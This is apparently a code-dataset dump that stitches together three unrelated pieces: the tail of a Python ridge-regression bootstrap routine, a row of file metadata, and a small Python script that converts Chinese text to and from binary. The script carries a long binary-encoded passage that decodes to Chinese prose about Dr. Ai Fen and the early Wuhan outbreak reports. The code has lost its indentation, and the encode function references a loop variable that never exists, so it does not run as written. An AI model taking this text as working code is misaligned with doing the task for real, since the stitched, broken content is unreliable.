logger.info("Calculating covariance matrix and saving")
covmat = np.array(np.dot(Rstim.T, Rstim))
logger.info("Doing eigenvalue decomposition on stim cov matrix")
L, Q = np.linalg.eigh(covmat)
for bi in counter(range(nboots), countevery=1, total=nboots):
logger.info("Selecting held-out test set..")
allinds = range(nresp)
indchunks = list(zip(*[iter(allinds)]*chunklen))
random.shuffle(indchunks)
shuffinds = list(itools.chain(*indchunks))
extra_inds = np.setdiff1d(allinds, shuffinds).tolist()
shuffinds.extend(extra_inds)
valinds.append(shuffinds)
RRresp = Rresp[shuffinds,:] # Train responses, now shuffled by chunks
# Find weights
logger.info("Computing weights for each response using shuffled training set..")
if use_svd:
wt = ridge(Rstim, RRresp, valpha, singcutoff=singcutoff, normalpha=normalpha)
else:
wt = eigridge(Rstim, RRresp, valpha, singcutoff=singcutoff, normalpha=normalpha, Q=Q, L=L, covmat=covmat)
logger.info("Calculating difference between original STRF weights and shuffled weights")
# This calculates the magnitude of each, thus ensuring a two-tailed test
mean_diff[:,:,bi] = np.abs(orig_STRF) - np.abs(wt)
if return_wts:
wts.append(wt)
# Calculate the p-values given the difference in weights
logger.info("Calculating shuffled p-value now")
pvals = 1. - np.sum(mean_diff>0,axis=2, dtype=np.float)/nboots
#logger.info(pvals)
return wts, valinds, pvals
| 44.990237 | 136 | 0.724223 | 5,031 | 32,258 | 4.610217 | 0.104949 | 0.010563 | 0.024144 | 0.009054 | 0.834009 | 0.817884 | 0.800595 | 0.788868 | 0.771234 | 0.760369 | 0 | 0.008655 | 0.179769 | 32,258 | 716 | 137 | 45.053073 | 0.867947 | 0.677072 | 0 | 0.46875 | 0 | 0.006944 | 0.134283 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.020833 | false | 0 | 0.024306 | 0 | 0.069444 | 0.048611 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
7a369d8e5b309a9ca92343338bb2f92dd722ce23 | 137,285 | py | Python | 中文转二进制.py | ZSX-JOJO/crawler_html2pdf | 96a72980cda3b1920557112b86bdbddd06c26ca0 | [
"Apache-2.0"
] | 710 | 2017-02-09T10:05:56.000Z | 2019-12-06T08:12:29.000Z | 中文转二进制.py | ZSX-JOJO/crawler_html2pdf | 96a72980cda3b1920557112b86bdbddd06c26ca0 | [
"Apache-2.0"
] | 33 | 2017-02-10T10:03:33.000Z | 2019-07-18T13:45:19.000Z | 中文转二进制.py | ZSX-JOJO/crawler_html2pdf | 96a72980cda3b1920557112b86bdbddd06c26ca0 | [
"Apache-2.0"
] | 627 | 2017-02-10T05:04:56.000Z | 2019-12-12T07:53:14.000Z | content = ""
def encode(text):
encode_content = []
encode_content.append(format(ord(i), 'b'))
print(" ".join(encode_content))
def decode(text):
content = text.split(" ")
decode_content = []
for i in content:
decode_content.append(chr(int(i, 2)))
print("".join(decode_content))
if __name__ == '__main__':
text = "把那串01的文本粘贴在这里"
decode(text)
if __name__ == '__main__':
text = "110010 110000 110001 111001 101111001110100 110001 110010 110011100001000 110011 110000 110010111100101 1111111100001100 1000001001111110 1000001010101100 110011011111110 110001011111111 101001000110000 1000111111000111 100111000000000 100111011111101 100111000001101 110011000001110 1000000010111010 111000010001110 111010111000101 100111010111010 111011010000100 111010111000101 110101111010010 110100011000000 110110101001011 110001010100101 101010001001010 1111111100001100 101100101111001 111010100101000 111111010100010 1000001001110010 101011100001000 101000111111010 11000000001100 1010011 1000001 1010010 1010011 101000110100000 111001010110110 111010111000101 110101111010010 11000000001101 101101101010111 110100000110111 1111111100001100 101111101010011 101100100100111 101101101100110 101010000001100 101101101100110 1001010111101110 1000110101110111 110010111110110 1111111100001100 101100101111001 101110000000110 1000111111011001 100111011111101 110001010100101 101010001001010 110001011001101 100111000001011 110011101100101 100111100100000 111111011011001 100111010000110 1000111111011001 100111101001101 101010000001100 110011000101111 101001100111011 111010100011111 111011010000100 101010000001100 101101101100110 11000000000010 101111101010011 110011001011010 1111111100001100 1000111111011001 100111011111101 110001010100101 101010001001010 100111100100000 1001000001001101 100111010000110 110101101100110 110110001001001 111011010000100 101001100111011 111010100011111 101011100001000 1111111100001100 1000111101101100 101001111010001 1000111111011001 100111011111101 110001010100101 101010001001010 111011010000100 100111010111010 101110000110001 101001100000101 110001011101100 1001000010100011 111000 100111101001101 1000100010101011 1000101101100110 110010110111001 1000101110101101 1000101111101011 111011010000100 101001100111011 111010100011111 11000000000010 1010 1010 1000111111011001 111111011011001 1000001001111110 1000001010101100 101111000100110 110011101100101 100111010000110 1001111010111011 111000011100110 1111111100001100 100111101011100 100111000111010 100111100100000 110010010101101 111011010000100 110111010010000 101100100110100 1111111100001100 101100101111001 1000100010101011 101001100111011 1001011001100010 111111010101010 101100111010100 111111010100110 1000110000001000 1111111100001100 1001000001101101 101001111010111 100111010000110 11000000001100 101001001001101 110001001000000 110011100101010 110011100001001 111011010000100 11000000000001 100111000100101 101001110001001 111011010000100 110010110100101 1000110100100011 11000000001101 1111111100001100 111100111110000 101100101111001 110011000101111 100111101011100 100111000111010 100111000010011 100111000011010 100111010111010 101100011101011 101011100101000 1001000000100000 1000110000100011 11000000000010 1010 1010 110101101100100 101001001001101 111011010000100 100111000000000 100111010011011 110001010100101 1001000001010011 1111111100001100 1000001001111110 1000001010101100 1000100010101011 111100111110000 100111000111010 11000000001100 101001111001000 100111000000000 100111000101010 1000100010101011 1000101110101101 1000101111101011 111011010000100 101100101110011 101001100111011 111010100011111 110110101101110 101000111111010 110110000110100 1001011101100010 11000000001101 1111111100001100 100111001011111 110011100001001 100111010111010 101110000000110 101100101111001 111100111110000 100111000111010 11000000001100 101010000111001 101010011101000 100111010111010 11000000001101 1111111100001100 1000001001111110 1000001010101100 111111010100000 110101101100011 100111010000110 1000111111011001 100111000101010 1000101111110100 110110011010101 1111111100001100 101100101111001 1000101111110100 1000000111101010 101110111110001 100111000001101 110011000101111 101010000111001 101010011101000 100111010111010 1111111100001100 110011000101111 1001000010100011 100111000101010 11000000001100 101001111010001 101010011101000 101101101010000 111011010000100 100111010111010 11000000001101 11000000000010 1010 1010 1000111111011001 110011000101111 11000000001010 100111010111010 111001001101001 11000000001011 110011 110011100001000 101001000001010 101110000000001 1001011101100010 11000000001010 110101101100110 110110001001001 101001100111011 111010100011111 11000000001011 111011010000100 111101100101100 100111010001100 111101111000111 110001010100101 1001000001010011 11000000000010 1010 1010 110010110000111 1111111101011100 1001111110011010 1000001111000001 111010000100110 1010 1010 111111100010110 1000111110010001 1111111101011100 1001000111010001 111011111110011 1010 1010 110010001000100 101111101110001 1111111101011100 101110000111001 101100100010101 1000111111011100 1010 1010 110001110100101 101001000110000 110101101100110 110110001001001 101111000000010 100111000101101 101111111000011 101001100111011 1001011001100010 110000000100101 1000101111001010 111100111010001 100111000111011 100111011111011 1000001001111110 1000001010101100 101010000001100 110000100001111 1001000111000111 1000101110111111 111011010000100 111011111101101 100111111100001 110011000101111 110011 110011100001000 110001 110010111100101 101000111001100 110011001101000 110101 111000010111001 1111111100001100 101100100100111 111111010100110 101001101001010 101110000001111 110010111110110 101010000001110 1111111100001100 110011 110011100001000 110001 110010111100101 101000111001100 110011001101000 110101 111000010111001 110011 110010 101001000000110 1111111100001100 101100101111001 111011010000100 101010000001100 100111010001011 11000000000001 111010100110010 111001010110110 1000000101111010 100111001110011 1000000101111010 101100100010110 111100111010001 100111000111011 100111011111011 110110001011111 101101101100110 101111010000110 101011011100000 110000100011111 110011111010011 110010110110000 101000110100000 1000000010111010 111000010001110 101001110111011 100111000010110 11000000000010 100111000100100 101100100101001 101010000001110 1111111100001100 1000101111100101 1001011001100010 111011100111100 111100111010001 101001001101111 100111000111011 100111011111011 110100010000101 100111011110010 110011000001110 1000111111000111 100111000010110 1111111100001100 100111011010110 101010010001100 110011101001110 110010110000111 100111010101110 110011000101111 101010000001100 100111000000000 111100111010001 101101110100100 11000000000010 1010 1010 110001000101010 110101101100010 110010 110000 110010 110000 101111001110100 110011 110011100001000 111001 110010111100101 1111111100001100 110101101100110 110110001001001 101111000000010 100111000101101 101111111000011 101001100111011 1001011001100010 101110111110010 110011100001001 110100 100111101001101 101001100111011 110001010100100 100111010111010 101010001011000 101011011100000 110000100011111 110011111010011 110010110110000 101000110100000 1000000010111010 111000010001110 101001110111011 100111000010110 10000000010100 10000000010100 111010110101011 110000011000101 101001111010001 111010100011111 100111011100101 110011101100101 1111111100001100 1000111111011001 101101110110110 111100110111011 101001101001110 101001101010111 110110101110111 1001110010011100 101111000000010 101011100111010 101001111101010 101000111100000 101000101101100 1001000111001100 111011010000100 101001100111011 1001011001100010 110001000010000 100111000111010 100111010000110 110101101100110 110110001001001 101111000000010 1000000001001100 101110111100101 110000100011111 110011111010011 100111010111010 110010101110000 110011100000000 101100100011010 111011010000100 101001100111011 1001011001100010 100111001001011 100111000000000 1111111100001100 110001101101110 101101010010010 100111101010011 110001010100101 1001000001010011 101001100111011 1001011001100010 1000110110000101 1000111111000111 110010 110000 110000 100111010111010 1000100010101011 110000100011111 110011111010011 1111111100001100 101000101110110 100111000101101 101001100000101 110001011101100 100111000001001 100111000101010 101001001101111 1001011001100010 1001010101111111 101010010001100 101100100011010 101010000001101 1000000001001100 1000000011111101 1001000011101000 1001010111101000 100111000111011 100111011111011 1111111100001100 101100100011010 100111000101010 111100111010001 101101110100100 100111000111011 100111011111011 111011011101110 101001001001101 110101101100011 101011100101000 111010100101000 1000101 1000011 1001101 1001111 111111011110100 110001100000001 11000000000010 1010 1010 110101101111011 100111010100001 111011010000100 1001011000110100 101111101110001 111101100111100 111111101101001 111011101000000 1000111111011001 101101110110110 110101101100110 110110001001001 101111000000010 110011100000000 101100100100111 111011010000100 100111000001001 111010100110010 101001100111011 1001011001100010 1111111100001100 110011100001001 101001100111011 111010100011111 101010001001010 1000101111001001 11000000001010 100111010111010 111001001101001 11000000001011 1111111100001100 101011100101000 101001100111011 1001011001100010 111011010000100 101100100100111 111111110100100 1001000111001100 1111111100001100 101000111100000 100111001001110 110110010100001 110011100001001 100111010111010 1000101111110100 1000101111011101 1111111100001100 101001111101010 101011100101000 111100111000001 100111000001011 1001111011011000 1001111011011000 110000010111100 101111111110101 11000000000001 1000101110101000 1000101110111010 11000000000010 1010 1010 110000010110010 101001001100111 101001110011111 110011100101100 110011100001001 110011100111010 100111100011010 1001000001111111 101000101001101 11000000000010 110010 110000 110001 111001 101111001110100 110001 110010 110011100001000 110011 110000 110010111100101 1111111100001100 1000001001111110 1000001010101100 110011011111110 110001011111111 101001000110000 1000111111000111 100111000000000 100111011111101 100111000001101 110011000001110 1000000010111010 111000010001110 111010111000101 100111010111010 111011010000100 111010111000101 110101111010010 110100011000000 110110101001011 110001010100101 101010001001010 1111111100001100 101100101111001 111010100101000 111111010100010 1000001001110010 101011100001000 101000111111010 11000000001100 1010011 1000001 1010010 1010011 101000110100000 111001010110110 111010111000101 110101111010010 11000000001101 101101101010111 110100000110111 1111111100001100 101111101010011 101100100100111 101101101100110 101010000001100 101101101100110 1001010111101110 1000110101110111 110010111110110 1111111100001100 101100101111001 101110000000110 1000111111011001 100111011111101 110001010100101 101010001001010 110001011001101 100111000001011 110011101100101 100111100100000 111111011011001 100111010000110 1000111111011001 100111101001101 101010000001100 110011000101111 101001100111011 111010100011111 111011010000100 101010000001100 101101101100110 11000000000010 101111101010011 110011001011010 1111111100001100 1000111111011001 100111011111101 110001010100101 101010001001010 100111100100000 1001000001001101 100111010000110 110101101100110 110110001001001 111011010000100 101001100111011 111010100011111 101011100001000 1111111100001100 1000111101101100 101001111010001 1000111111011001 100111011111101 110001010100101 101010001001010 111011010000100 100111010111010 101110000110001 101001100000101 110001011101100 1001000010100011 111000 100111101001101 1000100010101011 1000101101100110 110010110111001 1000101110101101 1000101111101011 111011010000100 101001100111011 111010100011111 11000000000010 1010 1010 1000111111011001 111111011011001 1000001001111110 1000001010101100 101111000100110 110011101100101 100111010000110 1001111010111011 111000011100110 1111111100001100 100111101011100 100111000111010 100111100100000 110010010101101 111011010000100 110111010010000 101100100110100 1111111100001100 101100101111001 1000100010101011 101001100111011 1001011001100010 111111010101010 101100111010100 111111010100110 1000110000001000 1111111100001100 1001000001101101 101001111010111 100111010000110 11000000001100 101001001001101 110001001000000 110011100101010 110011100001001 111011010000100 11000000000001 100111000100101 101001110001001 111011010000100 110010110100101 1000110100100011 11000000001101 1111111100001100 111100111110000 101100101111001 110011000101111 100111101011100 100111000111010 100111000010011 100111000011010 100111010111010 101100011101011 101011100101000 1001000000100000 1000110000100011 11000000000010 1010 1010 110011 110011100001000 110010 110010111100101 100111000001011 101001101001000 1111111100001100 1000001001111110 1000001010101100 101011100101000 110101101100110 110110001001001 101111000000010 100111000101101 101111111000011 101001100111011 1001011001100010 101001101010111 100111010101100 1000110111101111 1001011001100010 101001100111010 110001110100101 101001111010111 100111010000110 11000000001010 100111010111010 111001001101001 11000000001011 111011010000100 100111000010011 1000101110111111 11000000000010 101100101111001 100111000000000 100111000101010 100111010111010 101011101010000 101011100101000 110000000100101 1000101111001010 101101110100100 101001010011110 101000101101100 101101110100100 100111000101101 1111111100001100 110011011111110 111111011001111 100111000000000 101100100101001 110001110100101 1000101111001010 1000110110000101 1000111111000111 110001 110101 110000 110000 100111101001101 110000010100011 1000000000000101 111011010000100 110000000100101 1000101111001010 111100111010001 110101101100100 110010111110110 101110111110010 110000001100010 101100100001101 100111010000110 101101110001001 1001011101011001 1111111100001100 110000000100101 1000101111001010 101100100100111 101001110000101 1001000111001100 101001111101010 1000111010111010 111011101000000 100111000000000 101010000001101 110110101000001 110110101101010 110110001001001 11000000000010 1010 1010 110101101100100 101001001001101 111011010000100 100111000000000 100111010011011 110001010100101 1001000001010011 1111111100001100 1000001001111110 1000001010101100 1000100010101011 111100111110000 100111000111010 11000000001100 101001111001000 100111000000000 100111000101010 1000100010101011 1000101110101101 1000101111101011 111011010000100 101100101110011 101001100111011 111010100011111 110110101101110 101000111111010 110110000110100 1001011101100010 11000000001101 1111111100001100 100111001011111 110011100001001 100111010111010 101110000000110 101100101111001 111100111110000 100111000111010 11000000001100 101010000111001 101010011101000 100111010111010 11000000001101 1111111100001100 1000001001111110 1000001010101100 111111010100000 110101101100011 100111010000110 1000111111011001 100111000101010 1000101111110100 110110011010101 1111111100001100 101100101111001 1000101111110100 1000000111101010 101110111110001 100111000001101 110011000101111 101010000111001 101010011101000 100111010111010 1111111100001100 110011000101111 1001000010100011 100111000101010 11000000001100 101001111010001 101010011101000 101101101010000 111011010000100 100111010111010 11000000001101 11000000000010 1001000111000111 1000101110111111 100111000101101 1111111100001100 1000001001111110 1000001010101100 110010101110000 110101100100001 110001111010000 1000110101110111 11000000001100 101010000001110 110000010010100 11000000001101 1000111111011001 100111000101010 1000101111001101 1111111100001100 101100101111001 101010000001110 110000010010100 101111101010011 101001000011101 1000100010101011 111111010100110 1000110000001000 101010000001110 110110010100001 110011100001001 111111011100111 111111011101101 101010000111001 101010011001101 101010011101000 101100011110000 1111111100001100 111001001111001 101001000101011 110011000101111 101101111111001 100111010001110 1000111111000111 100111000010110 111011010000100 101010000001100 100111010001011 1111111100001100 11000000001100 110010111101001 111011111100101 1001000001010011 110011100001001 100111011001010 101100100101001 1111111100001100 110001000010001 111101110100001 100111011010110 110001001111001 1000101111000100 100111000001101 110001001111001 1000101111000100 1111111100001100 11000000001110 1000000000000001 101101101010000 11000000001111 101001000110000 101100100000100 1000101111110100 1111111100001100 110011000101111 100111000001101 110011000101111 1111111100011111 11000000001101 1010 1010 101000101110011 100111010001110 110101101100110 110110001001001 101111000000010 100111000101101 101111111000011 101001100111011 1001011001100010 101010010001100 1000001001111110 1000001010101100 110011100101100 100111010111010 101011100101000 1000111111000111 101001110111011 111011010000100 100111000100100 100111000101010 101100100011010 110011100001000 100111000101101 101001000110000 101111010010101 111111011001111 101001110000110 100111010000110 100111011000000 100111001001000 1111111100011111 100111011100101 100111000001011 1111111100001100 110011000101111 1000001001111110 1000001010101100 111011010000100 1000101110110010 1000111111110000 10000000010100 10000000010100 1010 1010 1000001001111110 1000001010101100 1010 1010 101001001001101 110001001000000 110011100101010 110011100001001 111011010000100 1000101110101101 110010110100101 1010 1010 101001110111011 101111001110100 110001 110010 110011100001000 110001 110110 110010111100101 1111111100001100 110001000010001 100111011101100 101001101010111 100111010101100 1000110111101111 1001011001100010 101001100111010 110000000100101 1000101111001010 111100111010001 110001110100101 1000101111001010 100111010000110 100111000000000 100111101001101 111010111000101 100111010111010 11000000000010 1000001110101011 101010000001101 101000101110110 101100110011001 1001101011011000 111000011100111 1111111100001100 100111000000000 111011011110100 111010100101000 1000001101101111 1001000011111101 100111000001101 101100101111101 1111111100001100 100111101010011 110111000101001 101001010101000 1001000011111101 100111000001101 101001010101000 100111000000000 100111000001011 11000000000010 110010 110010 101001111110111 101110000110001 1000111101101100 101001000110000 100111010000110 101010001111100 101010000111000 111100111010001 1111111100001100 101000001011010 100111010000110 111111010100100 111111011110100 110010100101111 110110000010100 111101110100001 1001010101011100 101001111010110 100111010000110 1000000010111010 110110011100001 111000001001100 110110100010111 110110110110010 1111111100001100 1001000000000001 101001110111011 101100100010110 1001011101100010 101000001011010 1001101011011000 1001000000011010 1001000111001111 110110101001011 101111010001111 1111111100001100 101010000001110 110011101100101 101001111100011 101100100110100 110001010100101 101000111111010 110011101100101 110011000101111 101000110100000 111001010110110 111010111000101 110101111010010 11000000000010 101111101010011 110010111110110 1111111100001100 101000101110111 100111101010011 111101110100001 101111010001010 111011010000100 101010000001100 100111010001011 101011100101000 110001000010001 1000000000110011 1000111110111001 101011010111100 100111010000110 101000111100000 1001000001001101 1111111100011010 1000001001111110 100111000111011 100111011111011 1111111100001100 1001000010100011 100111000101010 100111010111010 110001010100101 111011010000100 110011000101111 101000110100000 111001010110110 111010111000101 110101111010010 11000000000010 101010000001110 110011101100101 110001000010001 100111011101100 110001001001101 111011111100101 1001000001010011 1001000010100011 100111000101010 111010111000101 100111010111010 110011000101111 101011100101000 101001101001110 101001101010111 110110101110111 1001110010011100 101000001011010 100111010001011 111011010000100 11000000000010 1010 1010 111110100100111 110001110100101 111011101000000 110001 110010 110011100001000 110010 110111 110010111100101 1111111100001100 101001101010111 100111010101100 1000110111101111 1001011001100010 101001100111010 101001111001000 110011101100101 100111010000110 100111000000000 100111000101010 111010111000101 100111010111010 1111111100001100 110011000101111 110001000010001 100111011101100 111100111010001 100111000000000 100111101001101 101001100111011 111010100011111 111011010000100 100111110000100 101000100111111 1111111100001100 110100 110000 101100100011010 101110010000001 1111111100001100 110110010100001 110011100001001 100111011111011 100111101010101 101011111111010 111100001000000 111010110111110 111010111000101 1111111100001100 1000000010111010 1001000011101000 100111000000000 101100001001100 111110011001010 110110110000010 1111111100001100 1000100001000000 110110000100111 1001100101110001 101010010001100 101001111101010 110011100001001 111001 110000 100101 1111111100001100 101011100101000 100111000001011 1001011101100010 101000101110110 100111011010110 101001100111011 1001011001100010 101110111110010 111111011001111 110110010111011 111010110010111 100111010000110 101110000000110 1000111111010001 110001 110000 101100100101001 101110111100110 101001111110011 1001000011111101 110110010100001 110011100001001 100111011111011 100111101010101 101100101111101 1000111101101100 1111111100001100 111010111000101 100111010111010 110010100110110 101001000110000 100111010000110 101010001111100 101010000111000 111100111010001 111011011010001 110001010100100 101101110100100 100111101001111 1001011001100010 11000000000010 101010000001100 110100000110111 101000001011010 100111010000110 111111010100100 111111011110100 110010100101111 110110000010100 111101110100001 1001010101011100 101001111010110 100111010000110 1000000010111010 110110011100001 111000001001100 110110100010111 110110110110010 1001000000000001 101001110111011 110100011000000 110110101001011 11000000000010 1010 1010 110001 110010 110011100001000 110011 110000 110010111100101 1001000010100011 101100100101001 100111000101101 101001101001000 1111111100001100 110001000010001 101011100101000 101010000001100 110110101001110 101001100111011 1001011001100010 101110111100101 100111101011100 111011010000100 101010000001100 101101101100110 101001111010001 100111010000110 100111000000000 101111100100000 101111110101110 100111111100001 101101111111001 1000101111011101 110001000101010 101011011111110 111111011011001 110001000010001 1111111100001100 110001000101010 101011011111110 100111000001010 101000110011001 111011101000000 1111111100011010 11000000001100 110011100000000 1000111111010001 100111000001101 1000100110000001 101001110111011 101001101001110 101001101010111 101010101001010 1111111100001100 1001000010100011 1001000111001100 1000011011101110 101100100011010 100111010111010 1001101011011000 111000011100111 10000000100110 10000000100110 11000000001101 100111011010110 1001010111101110 110001000010001 110011000101111 100111000001101 110011000101111 111011100011111 111011010000100 1111111100001100 101111101010011 110010111110110 1111111100001100 110001000010001 110101101100011 101011100101000 111010100110101 1000000100010001 100111000001010 111011100001011 100111000000000 100111000101010 101111110001000 101000101111000 101011110001011 111011010000100 1000000010111010 1001000011101000 110000100011111 110011111010011 110000010100011 1000000000000101 111011010000100 1000011 1010100 1111111100001100 110001000010001 101110000110001 110001010001010 1000011 1010100 101111101010101 100111010000110 100111000000000 110101110110101 110001 110001 111100111010010 1001010010011111 111011010000100 1000100111000110 1001100010010001 100111100100000 111111011011001 100111011010110 1111111100001100 101010001001010 1000101111001001 100111011010110 1000111111011001 110011000101111 100111000001010 101001101001000 110011101100101 110001000010001 100111011101100 110000000100101 1000101111001010 111011010000100 100111000000000 100111000101010 111010111000101 100111010111010 1111111100001100 100111001011111 110011000101111 101001101001110 101001101010111 110110101110111 1001110010011100 101111000000010 101011100111010 111011010000100 11000000000010 1010 1010 101111101010011 101100100101001 100111000001011 101001101001000 110100 111000010111001 101001000011010 1000111111000111 1111111100001100 101010000001100 100111010001011 111111011011001 110001000010001 111011100001011 100111010000110 100111000000000 100111011111101 110001010100101 101010001001010 1111111100001100 100111000001010 1001011101100010 101000110011001 111011010000100 110011000101111 1111111100011010 1010011 1000001 1010010 1010011 101000110100000 111001010110110 111010111000101 110101111010010 11000000000001 111111011111111 1000000100010011 101000001000111 101001101010101 1000000011011110 1000001111001100 11000000000001 110100 110110 111100111001101 101001111100011 1000000101010100 101111 101010001111100 101010000111000 1001000001010011 101101110011010 110100100001101 1000001111001100 11000000000010 110001000010001 100111011010100 111111011000110 111011100001011 100111010000110 101111110001000 101100100011010 1001000001001101 110001010100101 101010001001010 1111111100001100 100111000001011 1001011101100010 111011010000100 110110011101000 1001000111001010 101000110011001 111011101000000 1111111100011010 1010011 1000001 1010010 1010011 101000110100000 111001010110110 111010111000101 110101111010010 110011000101111 100111000000000 111100111001101 101001101010101 1000000010100001 110101101100011 1001010011111110 1010010 1001110 1000001 111010111000101 110101111010010 11000000000010 1000101111100101 111010111000101 110101111010010 100111000111011 1000100110000001 100111100100000 110010010101101 110010110111001 101111100001111 100111000111010 1000111111010001 1000110111011101 111100110111011 1001100011011110 110110010101011 100111100100000 110010010101101 110001000010110 110001110100101 1000100111100110 110000010100011 1000000000000101 101010001111100 101010000111000 1001000001010011 101001000000110 110110011001100 111001001101001 1111111100001100 101001111101111 101111100010101 1000110101110111 111011010000100 100111000000000 111100111001101 101000101110111 110011100001001 110011000001110 110011000111110 100111100100000 110011111010011 110000000100111 1111111100001100 101001111101111 111110100101111 101001111001010 101100100011010 100111000101010 1000000100001111 101011001101000 111110011111011 111111011011111 111011010000100 111001001111001 110101110001010 1000000010111010 111000010001110 1111111100001100 100111001011111 111100111110000 1001011101011110 101000101111000 101011110001011 1000000010111010 111000010001110 11000000000010 1010 1010 101111101010011 110010111110110 1111111100001100 110001000010001 101010000010011 101000111111010 100111010000110 100111000000000 1000111010101011 101000110110111 110110001010111 1111111100001100 1000111111011001 110011000101111 100111000000000 100111000101010 101111110001000 101001111101111 110000000010101 111011010000100 100111000011100 1000100101111111 11000000000010 111010111000101 100111010111010 110010100110110 101011100101000 101010001111100 101010000111000 111100111010001 1111111100001100 110001100001001 1001000001010011 111010000000110 101111010010100 1000101111100101 101010001111100 101010000111000 111100111010001 100111000001010 110001010100101 1000111111011001 100111000101010 110000011000101 101000110110101 1111111100001100 100111101000110 110011000101111 100111000111010 100111010000110 100111111011101 1001011001101001 101010010001100 1001000111001101 1000100111000110 1000110101110111 1000100111000001 1111111100001100 110001000010001 1000111111011000 110011000101111 111101011001011 101001000111011 110001001010011 111010100110101 1000101111011101 100111000001010 110001010100101 111111011011001 100111010000110 101001100111011 1001011001100010 101000101101100 101000101110001 101001101101011 111010100011111 111100111010001 101010010001100 1001011001100010 110000100011111 111100111010001 11000000000010 101111101010011 110010111110110 110001000010001 100111011101100 101001100111011 1001011001100010 101010001111100 101010000111000 111100111010001 100111000111011 100111011111011 110101101100011 101100101111101 100111011001110 110001000010001 1001010111101000 101001111100011 1000111111000111 1111111100001100 100111011010110 110011000101111 101001111000010 101001010100000 1000111111000111 1001011101011110 101000101111000 111011010000100 100111010111010 1111111100001100 110001000010001 110001010001010 100111011010110 110001010010011 100111101001111 1111111100001100 1000101111110100 1111111100001100 110001000010001 100111011101100 110011100001001 100111000101010 111010111000101 100111010111010 110010100110110 101001000110000 100111101100000 100111011101100 111100111010001 101101110100100 1111111100001100 101001111010001 111001110110000 100111010000110 1000111111011001 100111000101010 100111000011100 1000100101111111 11000000000010 100111011010110 101111101010011 110010111110110 100111000000000 111011100001011 101110000110001 1000101111110100 1111111100001100 1001000010100011 101110000110001 1001111010111011 111000011100110 100111010000110 11000000000010 110001000010001 101110000110001 111011111100101 1001000001010011 1000111111011001 100111000101010 100111010001011 110000011000101 1001111010111011 111000011100110 100111010000110 11000000000010 1010 1010 111111011011001 101001100111011 1001011001100010 110001001010011 101101110001100 111010100110101 1000101111011101 1111111100001100 110001000010001 100111001011111 111111011011001 110001000010001 101010000001100 101101101100110 100111100100000 100111010000110 1000111111011001 100111011111101 110001010100101 101010001001010 1111111100001100 111001001111001 110000100001111 101011100101000 11000000001100 1010011 1000001 1010010 1010011 101000110100000 111001010110110 111010111000101 110101111010010 11000000000001 111111011111111 1000000100010011 101000001000111 101001101010101 1000000011011110 1000001111001100 11000000000001 110100 110110 111100111001101 101001111100011 1000000101010100 101111 101010001111100 101010000111000 1001000001010011 101101110011010 110100100001101 1000001111001100 11000000001101 1000111111011001 100111000000000 110001110010010 101101101010111 100111000001010 111010100111011 100111010000110 100111000101010 111111010100010 101011100001000 1111111100001100 111011011101110 111011010000100 110011000101111 110001111010000 1001000110010010 100111011010110 110110011101000 110000100001111 11000000000001 1001000111001101 1000100111000110 11000000000010 110001000010001 100111001011111 110001010001010 110001010100101 101010001001010 101001111010001 101011100101000 100111010000110 111100111010001 101101110100100 101001100111011 111010100011111 111111110100100 1001000111001100 1001011101100010 1111111100001100 110001111010000 1001000110010010 101100100100111 101101110110110 110110011101000 110000100001111 1001011000110010 1000001100000011 11000000000010 1010 1010 101111101010011 101100100101001 110011001011010 100111000001010 1111111100001100 1000111111011001 100111000101010 100111000011100 1000100101111111 101110000110001 100111100100000 1001000001001101 100111010000110 1111111100001100 101010000000100 101100100000100 100111100100000 111011010000100 110001000101010 101110001001111 1001000011111101 110011000101111 110001000010001 111010100111011 111111010100010 101011100001000 111011010000100 1001000010100011 100111000101010 111000101100111 111001001000111 1111111100001100 101001100000101 110001011101100 101010000001110 110011101100101 111011111100101 1001000001010011 110011101001110 110010110000111 100111010101110 100111100100000 101011100101000 111111110100100 1001000111001100 111011010000100 100111001011111 110011000101111 1001000010100011 100111011111101 11000000000010 110001000010001 101111111000011 1001000111001100 101111101010011 110010111110110 101110000110001 110000011110011 101001111101111 1000000011111101 101011101001111 100111010001011 101000100111111 100111010000110 11000000000010 110001 110000 111000010111001 110010 110000 1111111100001100 101001100111011 1001011001100010 101001111010001 110011101100101 100111010000110 100111111100001 110000001101111 1111111100001100 110011000101111 1000111101101100 101111000000010 101001101101011 101000001100101 101100111010100 111011010000100 1001000000011010 111011111100101 1111111100001100 101100100100111 110000100001111 101110000110001 110011000101111 101000101110011 100111010001110 100111000001101 110011000001110 101001110011111 101011011100000 1000000010111010 111000010001110 1111111100001100 100111000001101 1000100110000001 1001011010001111 110000100001111 101101111111001 101100100010110 101001111010001 101111000000011 1111111100001100 1001000001111111 101000101001101 101111100010101 1000110101110111 111111110100100 100111100010111 110000001010000 110000101001100 1111111100001100 101100110000010 110011110011100 101011011100000 100111000111010 100111111100001 110000001101111 110110011000100 1001011100110010 101111100010101 101001111010001 110000001010000 110000101001100 1111111100001100 1000100110000001 1000111111111101 1000110100100011 11000000000010 1010 1010 110001000010001 101111101010011 110010111110110 101111111000011 1001000111001100 101110000110001 101111110001000 101101110110011 110000000010101 1111111100001100 111101011001011 101001000111011 110001010001010 1000111111011001 110011101100001 100111111100001 110000001101111 1000111101101100 111111011011001 100111010000110 110001000010001 101010000001100 101101101100110 11000000000010 1000111111000111 100111010000110 101100100100111 110100110000010 100111000000000 100111000101010 101110000001111 110010111110110 1111111100001100 101001100111011 1001011001100010 101001111001000 110011101100101 100111010000110 100111000000000 100111011111101 1001000000011010 111011111100101 1111111100001100 101000110001101 110101100100001 101111100111010 1000110000000011 111111110100100 101000110000101 111011010000100 111011011111000 101000101110011 110110110001000 110000001101111 100111000001101 1000000011111101 101100100010110 100111100100000 11000000000010 100111000000000 101100100101001 101010000001110 1111111100001100 110001 110011100001000 110001 110010111100101 110011001011010 100111000001010 110001 110001 111000010111001 110100 110110 101001000000110 1111111100001100 101001100111011 1001011001100010 111011011010001 101101111011111 111100111010001 111100111010001 1001010101111111 111111011011001 110001000010001 101001111010001 100111010000110 110011101100001 110110110001000 110000001101111 1111111100001100 1000101110101001 110001000010001 111101100101100 100111010001100 101100100101001 110010111101001 100111000001010 1000111111000111 101001110111011 100111000000000 100111000001011 11000000000010 1010 1010 1001000010100011 